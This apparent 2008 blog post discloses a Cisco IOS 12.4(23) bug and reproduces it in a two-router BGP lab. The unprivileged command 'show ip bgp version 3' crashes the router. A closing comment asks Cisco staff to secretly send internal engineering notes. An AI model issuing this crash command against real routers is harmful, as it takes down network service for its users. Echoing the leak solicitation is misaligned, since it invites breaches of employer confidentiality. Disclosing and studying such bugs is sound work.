Cisco BGP bug crashes 12.4(23)
Written by jlgaddis on December 6, 2008 – 2:51 pm -Two 7200s connected back to back via their serial 2/0 ports. Bring up a link, establish a BGP neighbor relationship between them and then kill your router. The cool thing is, you can even do it from unprivileged mode:
c7200-b# conf t
c7200-b(config)# int loopback 0
*Dec 6 19:36:57.871: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback0, changed state to up
c7200-b(config-if)# ip address 192.168.1.1 255.255.255.0
c7200-b(config-if)# interface serial 2/0
c7200-b(config-if)# ip address 10.0.0.2 255.255.255.252
c7200-b(config-if)# no shutdown
c7200-b(config-if)#
*Dec 6 19:37:13.875: %LINK-3-UPDOWN: Interface Serial2/0, changed state to up
c7200-b(config-if)#
*Dec 6 19:37:13.879: %ENTITY_ALARM-6-INFO: CLEAR INFO Se2/0 Physical Port Administrative State Down
c7200-b(config-if)#
*Dec 6 19:37:14.883: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state to up
c7200-b(config-if)# do ping 10.0.0.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 10.0.0.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/13/24 ms
c7200-b(config-if)# router bgp 65001
c7200-b(config-router)# neighbor 10.0.0.1 remote-as 65000
c7200-b(config-router)# network 192.168.1.0 mask 255.255.255.0
c7200-b(config-router)# end
c7200-b#
*Dec 6 19:37:36.911: %SYS-5-CONFIG_I: Configured from console by console
c7200-b#
*Dec 6 19:37:40.919: %BGP-5-ADJCHANGE: neighbor 10.0.0.1 Up
c7200-b# show ip bgp
BGP table version is 3, local router ID is 192.168.1.1
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale
Origin codes: i - IGP, e - EGP, ? - incomplete
Network Next Hop Metric LocPrf Weight Path
*> 192.168.0.0 10.0.0.1 0 0 65000 i
*> 192.168.1.0 0.0.0.0 0 32768 i
c7200-b# exit
Then, while in unprivileged mode…
c7200-b> show ip bgp version 3
…and that’s it. From the other router, we see that it’s down:
c7200-a> ping 10.0.0.2 Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 10.0.0.2, timeout is 2 seconds: ..... Success rate is 0 percent (0/5) c7200-a>
And a moment later we’ll see the BGP adjacency go down:
*Dec 6 19:42:59.419: %BGP-5-ADJCHANGE: neighbor 10.0.0.2 Down Interface flap c7200-a>
Tags: bgp, cisco, hacking, internet, networking, security | 1 Comment »
January 22nd, 2009 at 12:34 am
Cisco peeps,
I know you’re reading this. I’m curious what’s on the eng. notes on the bug. Somebody send ‘em to me from a personal e-mail account (jeremy AT evilrouters DOT net). =)
I won’t reveal your identity, of course. I’m just curious.
-Jeremy